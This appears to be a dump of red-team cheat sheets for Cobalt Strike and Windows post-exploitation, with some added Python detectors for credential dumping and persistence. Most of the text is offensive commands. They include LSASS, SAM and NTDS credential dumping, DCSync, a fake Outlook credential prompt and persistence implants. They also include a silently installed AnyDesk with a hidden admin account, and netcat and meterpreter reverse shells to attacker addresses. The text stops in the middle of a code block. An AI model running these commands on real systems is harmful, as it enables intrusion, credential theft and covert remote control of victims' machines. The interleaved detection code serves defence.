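EventID=1 Image=C:\Windows\System32\reg.exe CommandLine=reg.exe save HKLM\sam sam.save
EventID=1 Image=C:\Windows\System32\reg.exe CommandLine=reg.exe query HKLM\Software\Microsoft
"""

PROCESS_VM_READ, PROCESS_VM_WRITE = 0x0010, 0x0020
# Processes that legitimately read lsass memory; tune per environment (assumption).
ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe"}
# Command-line shapes from the SAM and LSASS dump sections above.
DUMP_CMDLINES = [
    re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b", re.I),
    re.compile(r"procdump.*-ma\s+lsass", re.I),
    re.compile(r"comsvcs\.dll.*minidump", re.I),
]
# key=value tokenizer that lets values contain spaces (paths, command lines)
KV = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_sysmon(text):
    return [dict(KV.findall(line)) for line in text.splitlines() if line.strip()]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_credential_dumping(events):
    """Return one alert per event that matches an lsass-access or hive-dump pattern."""
    alerts = []
    for e in events:
        if e.get("EventID") == "10" and basename(e.get("TargetImage", "")) == "lsass.exe":
            granted = int(e.get("GrantedAccess", "0"), 16)
            # Sysmon prints UNKNOWN(addr) for frames with no backing module:
            # injected shellcode or a BOF running from unbacked memory.
            unbacked = "UNKNOWN(" in e.get("CallTrace", "")
            src = basename(e.get("SourceImage", ""))
            if src in ALLOWLIST and not unbacked:
                continue
            if unbacked:
                alerts.append({"event": 10, "image": src, "reason": "unbacked code opened lsass"})
            elif granted & (PROCESS_VM_READ | PROCESS_VM_WRITE):
                alerts.append({"event": 10, "image": src, "reason": "lsass opened with memory read/write access"})
        elif e.get("EventID") == "1":
            cmd = e.get("CommandLine", "")
            if any(p.search(cmd) for p in DUMP_CMDLINES):
                alerts.append({"event": 1, "image": basename(e.get("Image", "")),
                               "reason": "credential-store dump command line"})
    return alerts


if __name__ == "__main__":
    for a in detect_credential_dumping(parse_sysmon(SAMPLE_SYSMON)):
        print(a)
```

Task Manager's `0x1000` (PROCESS_QUERY_LIMITED_INFORMATION) handle is ignored because it cannot read memory, while the `0x1010` handle from an unexpected process with an unbacked call-trace frame is what the BOF-based dumpers listed above produce. The built-in `logonpasswords` and `hashdump` commands run inside the beacon process, so the SourceImage will be whatever the beacon was injected into; that is why the access mask and call trace, not the image name, carry the detection.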
597 |
598 | ### [SharpSecDump](https://github.com/G0ldenGunSec/SharpSecDump) SAM and LSA extraction
599 | Remotely dump SAM and LSA secrets (same functionality as Impacket's secretsdump.py)
600 | ```
601 | # Runs in the context of the current user
602 | # Local Admin privileges are required on the target machine
603 | execute-assembly C:\SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=lab.local
604 | ```
605 |
606 | ### NTDS.dit dump (all commands below require Domain Admin privileges!)
607 |
608 | [Invoke-DCSync.ps1](https://gist.github.com/monoxgas/9d238accd969550136db) to perform DCSync attacks remotely
609 | ```
610 | powershell-import --> Invoke-DCSync.ps1
611 |
612 | # Perform DC Sync hash dump for all users in the target domain
613 | powershell Invoke-DCSync -Domain lab.local [-DomainController ops-dc01.lab.local]
614 |
615 | # Perform DC Sync hash dump for all users in the specified group
616 | powershell Invoke-DCSync -Domain lab.local -GroupName "Domain Admins" | ft -wrap -autosize
617 | ```
618 | [Copy-VSS.ps1 from Nishang toolkit](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1) to dump NTDS.dit locally on the DC
619 | ```
620 | powershell-import --> Copy-VSS.ps1
621 | powerpick Copy-VSS -DestinationDir C:\temp
622 | ```
623 | NTDSutil.exe to dump NTDS.dit locally on a Domain Controller
624 | ```
625 | run ntdsutil.exe "activate instance ntds" "ifm" "create full C:\ntdsutil" quit quit
626 | ```
627 |
628 | ### Credential Prompt
629 | [CredPrompt](https://github.com/guervild/BOFs/tree/dev/CredPrompt) to ask the current user for their username/password.
630 | ```
631 | credprompt "Credentials are required to re-authenticate to Outlook:"
632 | ```
633 | ------------------------------------------------------------------------------------------
634 | ## Exfiltration - Email
635 |
636 | ### [MailSniper](https://github.com/dafthack/MailSniper)
637 | PowerShell tool to search mailboxes in a Microsoft Exchange environment
638 | ```
639 | powershell-import -> Select MailSniper.ps1
640 |
641 | # Search all mailboxes in a domain - Looks for "*password*","*creds*","*credentials*"
642 | powershell Invoke-GlobalMailSearch -ImpersonationAccount current-username -ExchHostname ExchangeHost.domain.com -OutputCsv global-email-search.csv
643 |
644 | # Search the current user's mailbox
645 | powershell Invoke-SelfSearch -Mailbox current-user@domain.com
646 |
647 | # Get the Global Address List (GAL)
648 | powershell Get-GlobalAddressList -ExchHostname ExchangeHost.domain.com -UserName domain\username -Password P@ssw0rd! -OutFile gal.txt
649 | ```
650 | ------------------------------------------------------------------------------------------
651 | ## Persistence
652 | [SharpStay](https://github.com/0xthirteen/SharpStay) - .NET Persistence
653 | ```
654 | # Scheduled task persistence
655 | execute-assembly C:\Sharpstay.exe action=ScheduledTask taskname=TestTask command="C:\windows\temp\file.exe" runasuser=testuser triggertype=logon author="Microsoft Corp." description="Test Task" logonuser=testuser
656 |
657 | # Service creation persistence
658 | execute-assembly C:\Sharpstay.exe action=CreateService servicename=TestService command="C:\Windows\temp\file.exe"
659 |
660 | # User registry key persistence
661 | execute-assembly C:\Sharpstay.exe action=UserRegistryKey keyname=Debug keypath=HKCU:Software\Microsoft\Windows\CurrentVersion\Run command="C:\Windows\temp\file.exe"
662 |
663 | # Many other methods available on the tool's github documentation
664 | ```
665 | [SharPersist](https://github.com/fireeye/SharPersist)
666 | ```
667 | # List persistence entries
668 | execute-assembly C:\SharPersist.exe -t [reg,schtaskbackdoor,startupfolder,service] -m list
669 |
670 | # Registry persistence
671 | execute-assembly C:\SharPersist.exe -t reg -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -k "hkcurun" -v "Test Payload" -m add -o env
672 |
673 | # Scheduled task backdoor persistence
674 | execute-assembly C:\SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -n "Test Scheduled Task" -m add -o daily
675 |
676 | # Startup folder persistence
677 | execute-assembly C:\SharPersist.exe -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -f "Test File on Startup" -m add
678 |
679 | # Windows service persistence
680 | execute-assembly C:\SharPersist.exe -t service -c "C:\Windows\System32\cmd.exe" -a "/c payload.exe" -n "Test Service" -m add
681 | ```
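Every mechanism SharpStay and SharPersist use above (Run keys, scheduled tasks, services, the Startup folder) is an autostart location that a defender can inventory and diff against a known-good baseline. The following is an added example, not SharpStay's, SharPersist's or StayKit's code: it compares two inventories, reports additions, modifications and removals, and raises the severity when a new entry runs from a temp or user-writable path or is wrapped in `cmd /c`, PowerShell or a script host. The two snapshots are constructed, and their shape (category to entry name to command line) is an assumption of the example.

```python
"""Compare two autostart inventories (registry Run keys, scheduled tasks,
services, Startup folder) and flag additions that look like the persistence
entries the commands above create. Added example, not SharpStay's,
SharPersist's or StayKit's code; the snapshots are constructed and their
shape (category -> entry name -> command line) is an assumption."""
import copy
import re

HKLM_RUN = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
HKCU_RUN = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Paths a signed product rarely starts from but a dropped payload often does
SUSPICIOUS_PATHS = re.compile(
    r"(\\windows\\temp\\|\\users\\[^\\]+\\appdata\\|\\programdata\\|%temp%|%appdata%)", re.I)
# Launch wrappers that hide the real payload behind a built-in binary
LOLBIN_WRAPPERS = re.compile(
    r"\b(cmd(\.exe)?\s+/[ck]|powershell(\.exe)?\s+-(e|enc|encodedcommand|nop|w\s+hidden)"
    r"|mshta|rundll32|regsvr32|wscript|cscript)", re.I)

# Constructed "known good" inventory taken before the engagement window.
BASELINE = {
    "run_keys": {
        HKLM_RUN + r"\SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
        HKCU_RUN + r"\OneDrive": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    },
    "scheduled_tasks": {r"\Microsoft\Windows\Defrag\ScheduledDefrag": r"%windir%\system32\defrag.exe -c -h -k -g -$"},
    "services": {"Spooler": r"C:\Windows\System32\spoolsv.exe"},
    "startup_folder": {},
}

# Constructed current inventory: the baseline plus what the SharpStay and
# SharPersist commands above would create, and one legitimate new entry.
CURRENT = copy.deepcopy(BASELINE)
CURRENT["run_keys"][HKCU_RUN + r"\Debug"] = r"C:\Windows\temp\file.exe"
CURRENT["run_keys"][HKCU_RUN + r"\Test Payload"] = r"C:\Windows\System32\cmd.exe /c payload.exe"
CURRENT["run_keys"][HKLM_RUN + r"\VMwareTray"] = r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr"
CURRENT["scheduled_tasks"][r"\TestTask"] = r"C:\windows\temp\file.exe"
CURRENT["services"]["TestService"] = r"C:\Windows\temp\file.exe"
CURRENT["startup_folder"]["Test File on Startup.lnk"] = r"C:\Windows\System32\cmd.exe /c payload.exe"


def score(cmd):
    """Reasons an autostart command line deserves attention; empty if none."""
    reasons = []
    if SUSPICIOUS_PATHS.search(cmd):
        reasons.append("runs from a temp or user-writable path")
    if LOLBIN_WRAPPERS.search(cmd):
        reasons.append("wrapped in cmd/powershell or a script host")
    return reasons


def diff_autostarts(baseline, current):
    """Return added, modified and removed autostart entries with a severity."""
    findings = []
    for category, entries in current.items():
        base = baseline.get(category, {})
        for name, cmd in entries.items():
            if name in base and base[name] == cmd:
                continue  # unchanged since the baseline
            reasons = score(cmd)
            findings.append({"category": category, "name": name, "command": cmd,
                             "change": "modified" if name in base else "added",
                             "severity": "high" if reasons else "review", "reasons": reasons})
    for category, entries in baseline.items():
        for name, cmd in entries.items():
            if name not in current.get(category, {}):
                findings.append({"category": category, "name": name, "command": cmd,
                                 "change": "removed", "severity": "review", "reasons": []})
    return findings


if __name__ == "__main__":
    for f in diff_autostarts(BASELINE, CURRENT):
        print(f["severity"], f["change"], f["category"], f["name"], f["reasons"])
```

The baseline entries are never scored, so OneDrive running from AppData stays quiet; only changes are. The VMware tray addition comes out as "review" rather than "high", which is the point: the diff surfaces every change, and the path and wrapper heuristics only decide what gets looked at first.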
682 |
683 | [StayKit](https://github.com/0xthirteen/StayKit) - Cobalt Strike persistence kit aggressor script
684 |
685 | ------------------------------------------------------------------------------------------
686 | # Cobalt Strike BOFs
687 | [My BOF Collection GitHub page](https://github.com/wsummerhill/CobaltStrike_BOF_Collections)
688 |
689 | ### [BOF.NET](https://github.com/CCob/BOF.NET/pull/1)
690 | A .NET runtime tool to load assemblies in memory and avoid the typical fork-and-run model from `execute-assembly`. Use BOF.NET to run any .NET tool for better evasion by residing in your current process. Note that this will not bypass AMSI or ETW as those will have to be unhooked separately, if needed.
691 | ```
692 | bofnet_init
693 | bofnet_load /path/to/assembly.exe
694 | bofnet_listassemblies
695 | bofnet_executeassembly AssemblyName argument1 argument2
696 | ```
697 |
698 | ------------------------------------------------------------------------------------------
699 | # References
700 | [Cobalt Strike commands cheat sheet](https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet)
701 |
702 | [AD exploitation cheat sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)
703 |
704 | [Sharphound](https://github.com/BloodHoundAD/SharpHound3)
705 |
706 | [PowerShell remoting cheat sheet](https://blog.netspi.com/powershell-remoting-cheatsheet/)
707 |
708 | [Mimikatz reference cheat sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
709 |
710 | [SpecterOps Cobalt Strike command reference](https://xzfile.aliyuncs.com/upload/affix/20190126174144-9767f9f2-214e-1.pdf)
711 |
712 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Red Team and OPSEC - 2023 Edition
2 |
3 | > The quieter you become, the more you are able to hear 🥷
4 |
5 | ## Basic System Info
6 | - `systeminfo`: Show detailed configuration about the computer and OS.
7 | - `hostname`: Display the host name of the current machine.
8 |
9 | ## Hotfix Information
10 | - `wmic qfe get Caption,Description,HotFixID,InstalledOn`: List patches and hotfixes installed on the system.
11 |
12 | ## User & Group Information
13 | - `net users`: List all user accounts.
14 | - `net localgroup`: List all local groups.
15 | - `net user hacker`: Show information about the user named "hacker".
16 | - `net group /domain`: List all domain groups.
17 |
18 | ## Network Details
19 | - `ipconfig /all`: Show detailed IP configuration.
20 | - `route print`: Display routing table.
21 | - `arp -a`: Show ARP cache.
22 |
23 | ## Privilege Information
24 | - `whoami /priv`: Display user privileges.
25 |
26 | ## Data Search
27 | - `findstr /spin "password" *.*`: Recursively search for the term "password" in files.
28 |
29 | ## Process & Service Details
30 | - `tasklist /SVC`: List running processes with service details.
31 | - `sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo --------- & @sc qc %i | findstr "BINARY_PATH_NAME" & @echo.) & del a 2>nul & del b 2>nul`: Identify unquoted service paths which can be exploited for privilege escalation.
32 |
33 | ## Network Connections
34 | - `netstat -ano`: List network connections, ports, and associated process IDs.
35 |
36 | ## Directory Access
37 | - `dir /a-r-d /s /b`: Search for writeable directories.
38 |
39 | ## Domain & Forest Info (PowerShell)
40 | - `[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()`: Get current domain details.
41 | - `([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()`: List trust relationships of current domain.
42 | - `[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()`: Get current forest details.
43 | - `([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()`: List trust relationships of a specific forest.
44 |
45 | ## Domain Controller and Trusts
46 | - `nltest /dclist:offense.local`: List all Domain Controllers in the specified domain.
47 | - `net group "domain controllers" /domain`: Display domain controllers in the domain.
48 | - `nltest /dsgetdc:offense.local`: Get Domain Controller details for a domain.
49 | - `nltest /domain_trusts`: List all domain trusts.
50 | - `nltest /user:"spotless"`: Fetch details for a specific user.
51 |
52 | ## Authentication & Session Details
53 | - `set l`: Display local environment variables.
54 | - `klist`: Display Kerberos tickets.
55 | - `klist sessions`: Display all logon sessions, including NTLM.
56 | - `klist tgt`: Display cached Kerberos TGT (Ticket Granting Ticket).
57 |
58 | ## Miscellaneous
59 | - `whoami`: Display logged-in user details (useful on older systems).
60 |
61 | ## Host Discovery
62 | Discover alive hosts in a network.
63 | - `$ nmap -sn -T4 -oG Discovery.gnmap 192.168.1.1/24`: Ping scan, no port scan.
64 | - `$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt`: Extract live hosts from the results.
65 |
66 | ## Top Ports Scan
67 | Identify most commonly used ports.
68 | - `$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt`: TCP SYN scan.
69 | - `$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt`: UDP scan.
70 |
71 | ## Full Range Port Scan
72 | Full range port scanning; UDP might be slow.
73 | - `$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt`: Common 3674 TCP ports.
74 | - `$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt`: All TCP ports.
75 | - `$ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt`: All UDP ports.
76 |
77 | ## Extract Open Ports
78 | Commands to extract and display open TCP and UDP ports.
79 | - `$ grep "open" FullTCP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "T:"$0}'`
80 | - `$ grep "open" FullUDP | cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' | xargs | sed 's/ /,/g' | awk '{print "U:"$0}'`
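The grep/cut/sed pipelines above rebuild two things from scan output: the list of hosts that answered, and the `T:...,U:...` port list that `-p` accepts. The following is an added example, not nmap's code, that parses the grepable (`-oG`) format the Discovery, TopTCP and ServiceDetect scans above write, so the same result can be reconciled against an asset inventory instead of eyeballed. The sample output is constructed in the `-oG` layout.

```python
"""Parse nmap grepable (-oG) output into live hosts and open ports, the job
the grep/cut/sed pipelines above do by hand. Added example, not nmap's
code; the sample output below is constructed in the -oG layout."""
import re

SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Mar  4 09:00:00 2024 as: nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///\tIgnored State: filtered (997)
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 53/open/udp//domain///, 3389/open/tcp//ms-wbt-server///
Host: 192.168.1.30 ()\tStatus: Down
# Nmap done at Mon Mar  4 09:05:00 2024 -- 3 IP addresses (2 hosts up) scanned in 300.00 seconds
"""

# One port record in -oG: port/state/proto//service/... separated by commas
PORT_RE = re.compile(r"(\d+)/(\w+)/(tcp|udp)//([^/]*)/")


def parse_gnmap(text):
    """Map ip -> {"up": bool, "tcp": [open ports], "udp": [open ports]}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment / summary lines
        ip = line.split()[1]
        entry = hosts.setdefault(ip, {"up": False, "tcp": [], "udp": []})
        if "Status: Up" in line:
            entry["up"] = True
        if "Ports:" in line:
            entry["up"] = True  # nmap only lists ports for hosts that responded
            for port, state, proto, _service in PORT_RE.findall(line):
                if state == "open":
                    entry[proto].append(int(port))
    for entry in hosts.values():
        entry["tcp"] = sorted(set(entry["tcp"]))
        entry["udp"] = sorted(set(entry["udp"]))
    return hosts


def live_hosts(hosts):
    """What the 'Status: Up' grep produces."""
    return sorted(ip for ip, e in hosts.items() if e["up"])


def port_spec(hosts):
    """What the two 'open' pipelines produce, joined into one -p argument."""
    tcp = sorted({p for e in hosts.values() for p in e["tcp"]})
    udp = sorted({p for e in hosts.values() for p in e["udp"]})
    parts = []
    if tcp:
        parts.append("T:" + ",".join(map(str, tcp)))
    if udp:
        parts.append("U:" + ",".join(map(str, udp)))
    return ",".join(parts)


if __name__ == "__main__":
    result = parse_gnmap(SAMPLE_GNMAP)
    print(live_hosts(result))
    print(port_spec(result))
```

Note that the FullTCP/FullUDP pipelines above read `-oN` (normal) output, where a port line looks like `22/tcp open ssh`; this parser covers the `-oG` files, which keep one host per line and are the easier format to diff between scan runs.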
81 |
82 | ## Service and OS Detection
83 | Identify services running and OS details.
84 | - `$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt`: Service detection.
85 | - `$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt`: OS detection.
86 | - `$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt`: Combined OS and service detection for specific ports.
87 |
88 | ## Evasion Techniques
89 | Methods to avoid firewalls or obfuscate scan origin.
90 |
91 | ### Segmentation
92 | - `$ nmap -f`: Segmented packet scan.
93 |
94 | ### MTU Manipulation
95 | - `$ nmap --mtu 24`: Change MTU size. It should be a multiple of 8.
96 |
97 | ### Decoy Scanning
98 | Make it appear the scan is coming from other hosts.
99 | - `$ nmap -D RND:10 [target]`: Randomized decoy scan.
100 | - `$ nmap -D decoy1,decoy2,decoy3 [target]`: Manually specify decoys.
101 |
102 | ### Zombie Host Scanning
103 | Use idle hosts to mask scan origin.
104 | - `$ nmap -sI [Zombie IP] [Target IP]`: Idle scan using a specific zombie.
105 |
106 | ### Specified Source Port
107 | - `$ nmap --source-port 80 [target]`: Scan with a specified source port (80 in this case).
108 |
109 |
110 | ## AnyDesk OPSEC Usage
111 | This outlines the usage of AnyDesk, a commercial remote access tool utilized by threat actors for browsing victim host file systems, deploying payloads, and data exfiltration.
112 |
113 | **Downloading and Installing AnyDesk:**
114 |
115 | 1. **Download AnyDesk Executable:**
116 | - Download the AnyDesk executable using PowerShell.
117 | - Example PowerShell Script:
118 | ```powershell
119 | Invoke-WebRequest -Uri -OutFile 'C:\ProgramData\AnyDesk.exe'
120 | ```
121 |
122 | 2. **Silent Installation and Password Configuration:**
123 | - Silently install AnyDesk and set an access password.
124 | - Commands:
125 | ```batch
126 | cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
127 | cmd.exe /c echo | C:\ProgramData\AnyDesk.exe --set-password
128 | ```
129 |
130 | **Configuring Additional Administrator Account:**
131 |
132 | 3. **Create an Additional Administrator Account:**
133 | - Add an administrator account with a password.
134 | - Command:
135 | ```batch
136 | net user "" /add
137 | ```
138 |
139 | 4. **Add Account to Administrators Group:**
140 | - Include the new administrator account in the Administrators group.
141 | - Command:
142 | ```batch
143 | net localgroup Administrators /ADD
144 | ```
145 |
146 | 5. **Hide Account from Login Screen:**
147 | - Prevent the account from appearing on the login screen.
148 | - Command:
149 | ```batch
150 | reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v /t REG_DWORD /d 0 /f
151 | ```
152 |
153 | **Gaining Remote Access with AnyDesk:**
154 |
155 | 6. **Execute AnyDesk with Get-ID Parameter:**
156 | - Launch AnyDesk with the `--get-id` parameter to enable remote access.
157 | - Command:
158 | ```batch
159 | cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
160 | ```
161 |
163 | # Web Path Scanner and Brute Force Tools
164 |
165 | ## Web Path Scanners:
166 |
167 | ### 1. **dirsearch**
168 | - A versatile directory and file brute-forcing tool.
169 | - Usage: `dirsearch [options]`
170 |
171 | ### 2. **DirBuster**
172 | - A GUI-based tool for directory brute-forcing.
173 | - Ideal for finding hidden web paths.
174 | - Download and usage instructions: [DirBuster](https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)
175 |
176 | ### 3. **Patator (Password Guessing)**
177 | - Patator is used for password guessing attacks across various protocols.
178 | - Install: `git clone https://github.com/lanjelot/patator.git /usr/share/patator`
179 |
180 | ## Brute Force with Patator:
181 |
182 | ```bash
183 | $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
184 | $ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
185 | $ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
186 | $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'
187 | ```
188 |
189 | ## DNS Enumeration with Fierce:
190 |
191 | - Fierce is a DNS enumeration tool that checks for zone transfers and DNS host name enumeration.
192 | - Usage:
193 | ```bash
194 | $ ./fierce.pl -dns example.com
195 | $ ./fierce.pl --dns example.com --wordlist myWordList.txt
196 | ```
197 |
198 | ## Web Service Scanning with Nikto:
199 |
200 | - Nikto is a web server scanner that detects vulnerabilities and misconfigurations.
201 | - Usage: `nikto -C all -h http://IP`
202 |
203 | ## WordPress Scan with WPScan:
204 |
205 | - WPScan is a specialized tool for scanning WordPress installations.
206 | - Usage:
207 | ```bash
208 | git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
209 | ./wpscan --url http://IP/ --enumerate p
210 | ```
211 |
212 | ## HTTP Fingerprint Identification with Httprint:
213 |
214 | - Httprint identifies HTTP server software and version.
215 | - Usage:
216 | ```bash
217 | wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
218 | cd httprint_301/linux/
219 | ./httprint -h http://IP -s signatures.txt
220 | ```
221 |
222 | ## Web Application Security Scanning with Skipfish:
223 |
224 | - Skipfish is a comprehensive web application security detection tool.
225 | - It generates interactive site maps and security reports.
226 | - Usage:
227 | ```bash
228 | skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP
229 | ```
230 |
231 | ## Network Scanning and Enumeration:
232 |
233 | ### NC (Netcat) Scan:
234 | ```bash
235 | # Basic port scan on 'target'
236 | nc -v -w 1 target -z 1-1000
237 |
238 | # Port scan range on a set of IP addresses
239 | for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
240 | ```
241 |
242 | ### Unicornscan:
243 | ```bash
244 | # Unicornscan for information gathering and security audits
245 | # Scanning for all ports and services (TCP and UDP)
246 | us -H -msf -Iv 192.168.56.101 -p 1-65535
247 | us -H -mU -Iv 192.168.56.101 -p 1-65535
248 | ```
249 |
250 | ### Xprobe2 for OS Fingerprinting:
251 | ```bash
252 | # Identify the operating system fingerprint on 'IP'
253 | xprobe2 -v -p tcp:80:open IP
254 | ```
255 |
256 | ## Enumeration and Windows Commands:
257 |
258 | ### Samba Enumeration:
259 | ```bash
260 | # Enumeration of Samba services on 'target'
261 | nmblookup -A target
262 | smbclient //MOUNT/share -I target -N
263 | rpcclient -U "" target
264 | enum4linux target
265 | ```
266 |
267 | ### SNMP Enumeration:
268 | ```bash
269 | # Enumerating SNMP on 'IP' using different commands
270 | snmpget -v 1 -c public IP
271 | snmpwalk -v 1 -c public IP
272 | snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
273 | ```
274 |
275 | ### Windows Commands:
276 | ```bash
277 | # Various Windows command-line operations
278 | net localgroup Users
279 | net localgroup Administrators
280 | search dir/s *.doc
281 | system("start cmd.exe /k $cmd")
282 | sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
283 | /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
284 | mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
285 | Procdump.exe -accepteula -ma lsass.exe lsass.dmp
286 | mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
287 | C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32
288 | C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64
289 | ```
290 |
291 | ## Tunneling and Port Forwarding:
292 |
293 | ### PuTTY Remote Port Forwarding:
294 | ```bash
295 | # Forward the remote port to the destination address using PuTTY
296 | plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
297 | ```
298 |
299 | ### Meterpreter Port Forwarding:
300 | ```bash
301 | # Meterpreter port forwarding for remote access
302 | # For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/portfwd/
303 | meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.194.141
304 | kali > rdesktop 127.0.0.1:3389
305 | ```
306 |
307 | ### Enabling RDP and Firewall Manipulation:
308 | ```bash
309 | # Enable the RDP service and configure firewall settings
310 | reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
311 | netsh firewall set service remoteadmin enable
312 | netsh firewall set service remotedesktop enable
313 |
314 | # Close Windows Firewall
315 | netsh firewall set opmode disable
316 | ```
317 |
318 | ### Meterpreter VNC/RDP:
319 | ```bash
320 | # Enabling VNC/RDP with Meterpreter
321 | # For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
322 | run getgui -u admin -p 1234
323 | run vnc -p 5043
324 | ```
325 |
326 | ### Using Mimikatz:
327 | ```bash
328 | # Using Mimikatz to retrieve Windows plaintext user name and password
329 | git clone https://github.com/gentilkiwi/mimikatz.git
330 | privilege::debug
331 | sekurlsa::logonPasswords full
332 | ```
333 |
334 | # Password Hash Gathering and Cracking
335 |
336 | ## Gathering Password Hash:
337 |
338 | ### Using pth-toolkit and pth-winexe:
339 | ```bash
340 | # Clone pth-toolkit and retrieve a shell using the hash
341 | git clone https://github.com/byt3bl33d3r/pth-toolkit
342 | pth-winexe -U hash //IP cmd
343 | ```
344 |
345 | ### Using xfreerdp:
346 | ```bash
347 | # Install freerdp-x11 and connect using a hash
348 | apt-get install freerdp-x11
349 | xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
350 | ```
351 |
352 | ### Using Meterpreter:
353 | ```bash
354 | # Use Meterpreter to gather hashes
355 | meterpreter > run post/windows/gather/hashdump
356 | ```
357 |
358 | ## Exploiting Hash to Gain Access:
359 |
360 | ### Using Metasploit psexec:
361 | ```bash
362 | # Set up a Meterpreter reverse shell using the hash
363 | msf > use exploit/windows/smb/psexec
364 | msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
365 | msf exploit(psexec) > set SMBPass HASH
366 | msf exploit(psexec) > exploit
367 | meterpreter > shell
368 | ```
369 |
370 | ## Password Cracking with Hashcat:
371 |
372 | ### Using Hashcat:
373 | ```bash
374 | # Crack passwords using Hashcat
375 | hashcat -m 400 -a 0 hash /root/rockyou.txt
376 | ```
377 |
378 | # Using Netcat (NC) for Shell Bouncing on Windows
379 |
380 | ## Listening and Connecting with NC:
381 |
382 | ### Setting Up a Listener:
383 | ```bash
384 | # Windows: Listen on port 31337 and execute cmd.exe
385 | c:> nc -Lp 31337 -vv -e cmd.exe
386 | ```
387 |
388 | ### Connecting to the Listener:
389 | ```bash
390 | # Connect to the Windows listener on IP and port 31337
391 | nc 192.168.0.10 31337
392 | ```
393 |
394 | ### Executing Shell on a Remote Host:
395 | ```bash
396 | # Execute cmd.exe on a remote host via NC
397 | c:> nc example.com 80 -e cmd.exe
398 | ```
399 |
400 | ### Setting Up a Listener on Port 80:
401 | ```bash
